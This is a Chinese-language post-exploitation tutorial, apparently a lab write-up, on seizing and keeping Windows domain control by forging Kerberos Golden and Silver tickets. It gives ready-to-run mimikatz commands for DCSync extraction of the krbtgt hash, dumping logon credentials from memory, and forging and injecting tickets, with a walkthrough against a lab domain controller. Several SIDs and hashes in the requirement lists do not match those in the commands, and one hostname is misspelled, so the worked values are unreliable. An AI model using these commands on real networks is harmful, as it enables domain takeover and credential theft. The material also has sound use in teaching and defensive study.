后渗透——域权限维持之利用黄金票据与白银票据获取域控权限

声明：本文介绍的技术仅供网络安全技术人员及白帽子使用，任何个人或组织不可传播使用相关技术及工具从事违法犯罪行为，一经发现直接上报国家安全机关处理

权限维持

黄金票据

ms14068的漏洞原理是伪造域管的tgt，而黄金票据的漏洞原理是伪造krbtgt用户的票据，krbtgt用户是域控中用来管理发放票据的用户，拥有了该用户的权限，就可以伪造系统中的任意用户

黄金票据的条件要求：

1.域名称 hacker.com
2.域的SID 值 S-1-5-21-1854149318-4101476522-1845767379
3.域的KRBTGT账户NTLM密码哈希或者aes-256值
0028977ae726d766b150520dc63df9b4
4.伪造用户名 administrator

提取域用户krbtgt的NTLM密码哈希

lsadump::dcsync /domain:hacker.com /user:krbtgt

伪造administrator用户

kerberos::golden /admin:administrator /domain:hacker.com /sid:S-1-5-21-1836192064-1636381992-1218642615 /krbtgt:ce420fcea94d02d7051ebfb82833edf7 /ptt

白银票据

白银票据与ms14068和黄金票据的原理不太一样，ms14068和黄金票据都是伪造tgt（门票发放票），而白银票据则是伪造st（门票），这样的好处是门票不会经过kdc，从而更加隐蔽，但是伪造的门票只对部分服务起作用,如cifs（文件共享服务），mssql，winrm（windows远程管理），dns等等

白银票据的条件要求

1.域名
hacker.com
2.域sid
S-1-5-21-1854149318-4101476522-1845767379
3.目标服务器FQDN
dc.hacker.com
4.可利用的服务
cifs
5.服务账号的NTML HASH
52c74fc45feba971209be6f2bc068814
6.需要伪造的用户名
test

获取域控机hash

mimikatz.exe privilege::debug sekurlsa::logonpasswords exit>1.txt

伪造白银票据

kerberos::golden /domain:hacker.com /sid:S-1-5-21-1836192064-1636381992-1218642615 /target:dc.hacker.com /service:cifs /rc4:031091bab05b768b471a7060b6d1bbf1 /user:test /ptt

实验环境：

• Windows Server 2012 R2 x64（域控机）
• Windows 7 x64 sp1 （域用户机）
• pfSense（路由）
  ms14068

具体搭建方法请参照企业级内网的域控环境搭建3万字详细部署教程

模拟实验：

伪造黄金票据

信息搜集

ipconfig /all拿到域名

whoami /all拿到SID

使用mimikatz软件拿到krbtgt用户的NTLM密码哈希

输入klist purge删除票证

伪造票证

将搜集到的信息替换到执行语句中使用mimikatz软件伪造administrator用户的票证然后退出

成功拿到域控

删除票据又拒绝访问了

伪造白银票据

信息搜集

ipconfig /all拿到域控ip

输入ping -a 10.1.1.1获取域全名dc.kacker.com

whoami /all拿到SID

导出域控机的hash

伪造票证

將搜集到的信息替换到执行语句中使用mimikatz软件伪造票证，访问即可